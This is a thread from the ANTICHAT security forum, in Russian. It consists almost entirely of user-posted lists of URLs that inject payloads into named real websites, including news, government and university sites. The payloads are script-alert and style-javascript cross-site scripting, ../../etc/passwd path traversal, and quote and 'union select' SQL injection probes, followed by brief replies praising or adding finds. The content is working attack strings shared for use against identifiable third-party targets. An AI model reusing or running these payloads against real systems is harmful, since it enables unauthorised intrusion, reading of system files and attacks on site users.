ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://www.phrack.org/search/index.php?author=&andor=or&title="%20style=backgro und:url(javascript:alert());"&comment=&submit=subm it
http://www.xakep.ru/local/include/iframe_rateit.asp?filedir=25244"><script>alert()</script>
http://otdell.bs.by/show.html?words...C%2 Fscript%3E
http://www.missworld.tv/bio/bio.sps?iBiographyID=51851'
http://www.latin.ru/cgi-bin/search/odm.pl?search="><script>alert()</script>
http://yellowpages.rin.ru/cgi-bin/s...ript%3E&srt=not
http://www.linuxchile.cl/docs.php?op=ver&id=65'
http://www.hw.ru/hi-tech/recordUsers1.jsp?login="><script>alert()</script>
http://www.superq.ru/comments.php?id=82_0_1_0_C"><script>alert()</script>
http://[любой_сайт_использующий_webmo ney_transfer].webmoney.ru/conf/pci_testlink.asp?A=1</xmp><script>alert(1)</script>&b=1<script>alert(2)</script>
http://xtools.org/"%20style=background:url(javascript:alert());".cfm ?nft=1&t=6&p=1
http://www.pro-hack.ru/tools/ip.html...pname=&search=
http://geo.webmoney.ru/asp/wmobjects_in_moscow.asp?al=0"><script>alert()</script>
http://zloy.org/news/686'/index.html
http://www.cyberinfo.ru/cgi-bin/prox...t%3E&port=8080
http://skvoznoy.org/news-cat/21'/
http://www.kkunst.com/kk/print.php?file='
http://top.voffka.com/search.php?key...3E&cat=Overall
http://www.leg.state.fl.us/statutes/...rt%28%29%29%3B
http://search.mcc.ac.uk/cgi-bin/htse...ipt%3E&x=0&y=0
http://koffiejunk.nl/?file=<script>alert()</script>
http://www.oil-gas.com.ua/data/rus/showdoc.php?file=<script>alert()</script>
http://www.frozenlight.de/engine/show.php?file=<script>alert()</script>
http://www.globalschoolbus.com/tools...age.php?file=\
http://www.cairchicago.org/ournews.php?file=<script>alert()</script>
http://chrisken.utacm.org/cksource.p...e/ckSource.php
http://wwwx.cs.unc.edu/~jsterrel/tes...viewsource.php
http://foreverblue.alsgekken.nl/show...rod.ru/nst.php
http://www.nesprogramme.org/download.../../etc/passwd
http://www.bissettmags.com.au/cgi-bi.../../etc/passwd
http://www.frostjedi.com/terra/scrip...e=graemlin.php
http://www.theater-schwedt.de/index....c/passwd&mex=7
http://beer.km.ru/index.php?file=/etc/passwd
http://www.bobdev.com/downloadstats.php?File=<script>alert()</script>
http://www.mercenaries.ru/inf/newcomm.php?type=gallery&nick=%21+%21+%21+MAXIMILI AN+%21+%21+%21"><script>alert()</script>&page=1
http://voronezh.net/job/read_vac.php...it=&from=20%27
http://www.u-antona.vrn.ru/gallery/showgallery.php?mcats=all&si=&what=allfields&name= '&when=&whenterm=
http://www.terms.ru/search.php?words...3C%2Fscript%3E
http://www.ret.ru/getpictspr.jsp?gid=229969%27
http://smi.rambler.ru/main.cgi?actio...3E&mh=t%27&wa=
http://whois.mazafaka.ru/?domain=%27&x=0&y=0
http://chat.vrn.ru/cgi-bin/h_grep.cg...pt%3E&sub=Find
http://www.skychat.ru/people/lost.php?PHPSESSID=><script>alert()</script>&NewPassword=1&PasswordHint=1&nick=1&Passwo rdHint1=1&Password=1&Password2=1
http://www.skychat.ru/people/lost.php?PHPSESSID=431798c8970a49ca53b92bff3839591 9&NewPassword=1&PasswordHint=1&nick=<script>alert( )</script>&PasswordHint1=1&Password=1&Password2=1
http://www.skychat.ru/people/form.php?sess=><script>alert()</script>&cid=-1888213412&comp_info=1&comp_info2=1&HTTP_USER_AGEN T=1
http://rcw-team.ru/tools/base64/base...PC9zY3JpcHQ%2B
http://www.aist.ru/search/?action=in...=%27&x=32&y=11
http://www.scoopthis.com/pages/artic.../../etc/passwd
http://www.netcat.ru/search/?action=index&text=%27
http://www.netcat.ru/search/?action=...t%3E&need_url=
http://mp3plus.ru/artist.php?id=446%27&id_jam=0
http://search.tut.by/?status=1&encoding=1&page=0'&how=rlv&query=666
http://list.gala.net/?p=1&cid=1"><script>alert()</script>
http://narod.yandex.ru/cgi-bin/yandmarkup?cluster=4&prog=0x2757571A&HndlQuery=872 59504&PageNum=0&g=5&d=0&ag=host&tg=1&q0=1009151392 %27%22%3E%3Cscript%3Ealert()%3C/script%3E&p=%27
http://www.e-mail.ru/fast/register.dll?show=.%3Cscript%3Ealert()%3C/script%3E
http://rusmuz.ru/m.php?artist=%3Cscript%3Ealert()%3C/script%3E&search=1&search_in=0
http://www.mp3search.ru/search.html?...vaScript%22%3E
http://shop.updated.com/shoppingSearch.jsp?query=%22%3E%3Cscript%3Ealert() %3C/script%3E
http://www.7wolf.ru/index.php?content=review&gam_id=6482&cdr_id=8294'
http://www.7wolf.ru/index.php?nws_date_d=03<script>alert()</script>&nws_date_m=11&nws_date_y=2005&content=news
http://www.games.ru/cheats/?search=%...E&PSearch=name
http://www.pages.ru/search.html?text...3C%2Fscript%3E
http://www.oszone.net/search.php?sea...d.x=0&send.y=0
http://severe.ru/index.php?h=10%27
http://accont.ru/modules.php?POSTNUK..._topics=&q=%27
http://aromas.ru/forum/search.php?text_poisk=%27
http://best-test.ru/index.php?t=disp...d=516478392%27
http://www.fiona.ru/phprusearch.php?...3C%2Fscript%3E
http://music.mail.ru/news/1846?menu_item=club"%20style%3Dbackground%3Aurl%28 JaVaScRiPt%3Aalert%28%29%29%3B
http://www11.pochta.ru/info.php?mid=agreement&lng=ru"><script>alert()</script>
http://arcade.icq.com/game.htm?code=110272767&RefId=910"><script>alert() </script>
http://www.koders.com/?s=%22%3E%3Csc...Ala=*&_%3Ali=*
http://linuxcenter.ru/news/2005<textarea>/11
http://www.video48.ru/search/?search...3C%2Fscript%3E
http://mp3rank.ru/shop'/
http://hotcharts.ru/mp3/mp3.php?id=065110097115116097099105097032038032066 10111003207711111110012103204503206911810111412111 6104105110103032098117114110115&source3=268&source 4=65/6596&source8=3/357&source11=9120&source12=118'"><script>alert()</script>
http://kurepin.ru/?id=113&color=%3Cs...3C%2Fscript%3E
http://by.ru/cat.cgi?query=%22%3E%3C...3C%2Fscript%3E
http://ishodniki.ru/ilook/search.php...%29%29%3B&m=or
http://www.proshivki.ru/downloads.php?productor=15'&chapter=7&page=1
http://www.ozon.ru/context/kidworld_...%F2%FC#comment
http://www.rbsearch.ru/search.php?sa...3C%2Fscript%3E
http://www.nmarket.ru/phone/search/?...phone&data=%27
http://www.888.com/site1/default.htm?page=main&lang=en&S=120871487149920257 &OS=120871487149920257"><script>alert()</script>&SR=677164&OSR=677164&flag=No&un=false&ver= java&l=&st=173&bc=123&anid=0&ic=0
http://www.tutorialized.com/tutorials/Perl-and-CGI/File-Manipulation/1'/1
http://sfgate.com/cgi-bin/qws/ff/qr?...pt%3E&Submit=S
http://www.tug.org/PSTricks/main.cgi...&search=Search
http://www.asianjournal.com/cgi-bin/.../../etc/passwd
http://www.colorado.edu/ralphie/find...ipt%3E&x=0&y=0
http://img365.imageshack.us/my.php?i.../../etc/passwd
http://mail.yandex.ru/search?text=66...heck=0&folder=[ваш_номер]&folder=[ваш_номер]&folder=[ваш_номер]&do=1
http://baku.ru/frmpst-text.php?cmm_id=34"><script>alert()</script>&usp_id=0&frm_id=362&frmpst_id=2483783&id=2 946020
http://sources.ru/cgi-bin/sources/se...t%3E&stype=AND
http://phpclub.ru/index.php?city="%20style=background:url(JaVaScRiPt :alert());&m=job
http://nextworld.ru/index.php?login=...rt%28%29%29%3B <<затем нажать на вход
http://library.dozory.ru/cgi-bin/sea...ipt%3E&x=0&y=0
http://www.pentagon.gov/srch/search?...t=-pub_date%27
http://www.crh.noaa.gov/ifps/<script>alert()</script>
http://www.nws.noaa.gov/wwamap/wwatxtget.php?cwa=usa&wwa=flood%20statement<script >alert()</script>
http://www.tcnet.ru/error.html?err=404&msg=<script>alert()</script>
http://www.oxigen.ru/redirect.cgi?.<script>alert()</script>
http://sitecity.ru/badlogin.phtml?message=<script>alert()</script>
http://www.securitylab.ru/bitrix/redirect.php?event1=extra_article_click&event2=poc &event3=241574&goto=<script>alert()</script>
http://www.web-hack.ru/tools/nslooku...3C%2Fscript%3E
http://find.gl/search.php?qq=<script>alert()</script>&said=&d=1
http://www.hostpk.net/luke.php?action=explorer&dir=<script>alert()</script>&do=download
http://capitalcity.combats.ru/enter.pl?login=%22%3E%3Cscript%3Ealert%28%29%3C%2F script%3E&step=2&reminder=%CF%E5%F0%E5%E9%F2%E8+%E A+%F1%EB%E5%E4%F3%FE%F9%E5%EC%F3+%F8%E0%E3%F312312 3http://search.cstrike.ru/?search=\'
http://search.gamestone.ru/?search=<script>alert()</script>
http://3mp3.ru/ru/search/text/?reque...pt%3E&what=all
http://holidayclub.inprogress.ru/catalog/index.php?flet=\"><script>alert()</script>&Co=4&Re=460
http://hotels.wia.ru/<script>alert()</script>
http://encycl.accoona.ru/?word=%3Csc...3C%2Fscript%3E
http://www.bioone.org/bioone/?request=<script>alert()</script>
http://www.openhardware.net/?file=<script>alert()</script>
http://www.avionicsmagazine.com/cgi/.../../etc/passwd
http://www.lamuv.de/cgi-bin/store.cg.../../etc/passwd
http://alumni.calstatela.edu/documen.../../etc/passwd
http://www.optimize.nl/site/jsp/print.jsp?file=<script>alert()</script>
http://www.linuxhq.com/perl-bin/sear...7&qid=4&spp=20
http://seminar.spylog.ru/?rp=seminars/descr/15\'/
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1\'
http://hw.ru/hi-tech/Login.jsp?login=\'\"><script>alert(1)</script>&password=\'\"><script>alert(2)</script>
http://www.srb.ru/search-results/?q=...d&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u\'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://smchat.ru/?s=reguser&login=\"><script>alert()</script>
http://www.film.ru/search.asp?what=%...ot&mode=medium
http://www.mtve.com/index.php?Page=2\"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1\";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Public...3C%2Fscript%3E
http://serial.com/?show=%3Cscript%3E...&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1\"style=background:url(java script:alert());\"
http://poisk.ru/#\"><script>alert()</script>
http://an.aport.ru/scripts/template....e=referat&Rt=2
http://www.sexvideogid.ru/search.php...3C%2Fscript%3E
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170\"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778\'\"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url=\"style =background:url(javascript:alert());\"
http://www.iceberg.ru/services/?id=23\'&parent=0http://www.spguwc.h15.ru/gb/index.php?action=viewcommentshttp://www.yuretz.ru/prikol.php?id=384\'
http://forum.farit.ru/calendar.php?s=&action=edit&eventid=14\'
http://www.naec.ge/?search_string=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://www.xoxma.od.ua/xoxma/10/473\'
http://www.koms.ru/forum(page2).php?conf=aa
http://www.tom-muck.com/blog/master.cfm?searchbox=\"><script>alert()</script>&Submit=Search
http://www.tom-muck.com/blog/index.cfm?month=12&year=2005&newsmonth=12/1/2005\'
http://www.webbe.de/index.shtml?CONT...ASSOCIATION=OR
http://mobile.optima.ua/bomba.php?c_id=10\'&lim=40\'\"><script>alert()</script>
http://comp-lik.biz/index.php?q=<script>alert()</script>&search_news=1&search_articles=1&search_dow nloads=1&search_links=1&search_faq=1&search_galler y=1&search_static=1&p=query&area=1
http://comp-lik.biz/index.php?categ=9\'&parent=0&p=downloads&area=1
http://www.prokredo.ru/ru/library/index.php?q13=&t13=&c13=20\'&show13=materials
http://card.romanticcollection.ru/toprated.php?page=<script>alert()<script>
http://blog.msk.ru/login.php?login=<script>alert()</script>&pass=&submit=OK
http://www.paladins.ru/znaxar.php?free=\"><script>alert(1)</script>&sila1=3\"><script>alert(2)</script>&lovk1=3\"><script>alert(3)</script>&intuiz1=3\"><script>alert(4)</script>&vinos1=12\"><script>alert(5)</script>&intel1=\"><script>alert(6)</script>&mudr1=\"><script>alert(7)</script>&sila2=\"><script>alert(8)</script>&lovk2=\"><script>alert(9)</script>&intuiz2=\"><script>alert(10)</script>&vinos2=\"><script>alert(11)</script>&intel2=\"><script>alert(12)</script>&mudr2=\"><script>alert(13)</script>&flag=2\"><script>alert(14)</script>
http://horoscopes.rambler.ru/day.html?day=1<script>alert(1)</script>&month=4&year=1965<script>alert(2)</script>
http://nakarte.rambler.ru/moscow/?query=%27
http://www.mebelm.com/search/?q=\'
http://www.ddd.kursknet.ru/cgi-bin/chat.pl?id=&language=<script>alert()</script>
http://games.alkar.net/csreg/chpass.php?filled=&account=\"><script>alert()</script>&password=&sendpass=
http://sofit.com.ua/rus/asearch/0/1/0/?ser_mid=-1&go_search=1&q_search=\"><script>alert()</script>
http://7000.ru/computers/details.php?id=2\'
http://www.softportal.com/search.php?search=1&search_string=\"><script>alert ()</script>
http://catalog.begun.ru/?q=\"><script>alert()</script>
http://cio.iv.ru/search.html в поиске sql пример 666\'
http://www.3a.kiev.ua/good.php?name=<script>alert()</script>
http://referat.na5.ru/load.php?id=504948\'
http://referat.apple-online.ru/index.php?type=diplom_1&id=3478\'
http://www.mobiteka.ru/melodies/melodies.shtml?artid=27\'
http://valinfo.ru/testresult.php?idtestgroup=0\'
http://www.newstrack.ru/newstrack3/p...ew/20050414/a/
http://www.1bb.ru/directory.php?cat=35\'
http://orsn.rambler.ru/baza/consult/index.php?action=tema&kod=1\"><script>alert()</script>
http://katz.ws/?q=\"><script>alert()</script>
http://www.flashmaster.ru/search/index.php?words=\'
http://www.flashmaster.ru/search/ind...Dforum&page=17
http://www.ext.ru/?id=7\"><script>alert()</script>
http://bbcom.ch/index.php?suche_wort=\"><script>alert()</script>
http://www.igromania.ru/games/?666\'

У меня вопрос, зачем в строке http://www.ext.ru/?id=7\"><script>alert()</script>
/? И без него всё отлично запускается)

__________________
..

Очень много повторных.

Ну уж извените, как смог!
Большинство багов принадлежат Киборгу! Респект чувак!

_http://plg.lrn.ru/index.php?sub=proj&sort=1
Нефильтруется ниодин параметр XSS(актив)

_http://www.information.com/search/index.html?brand=1&cat=1&keyword=slip"><script>ale rt(/slip/)</script>

__________________
..

Отжёг... А самому искать - не судьба?!

_http://www.aif.md/index.asp?qu=%3Cscript%3Ealert%28%2Ff0und_by_back0 rifice%29%3C%2Fscript%3E&Submit=%CD%E0%E9%F2%E8&do c=search
_http://www.climate.md/?page='client/belt
_http://www.dnestrblog.net/comunity/blogs/lianc/commentrss.aspx?PostID=252'
_http://www.forum.md/Discuss.aspx?id=700595'
_http://www.galanter.net/guests/showguest.asp?Account=9'
_http://www.iks.ru/etc/passwd
_http://www.meteoprog.com.ua/gorodMira.php?cityid=277'
_http://www.sdarm.md/shownews.php?id=14'
_http://www.takt.tomsk.ru/db/trav2.list_member?pid=513'
_http://www.transneogrup.md/news/news.php?ln=ru&s=n&id=76'
_http://www.yes.md/RemarkList.aspx?theid=25&disid=1018'

_http://shveimash.spb.ru/index.php?type=pages&id=-1+union+select+null,null/*
_http://shveimash.spb.ru/index.php?type=catalog&id=111&brand=%3Cscript%3Eal ert(12)%3C/script%3E

_http://search.nasa.gov/search/search?searchType=lb&q=%3C%2Ftitle%3E[sL1p]%20%20%3Ctextarea+style%3D%22display%3Anone%22%3E& btnG=GO&output=xml_no_dtd&sort=date%3AD%3AL%3Ad1&s ite=nasa_collection&ie=UTF-8&oe=UTF-8&client=nasa_production_lb&proxystylesheet=nasa_p roduction_lb&actionType=searchIndex&numgm=5

Вот такое крутое наса

__________________
..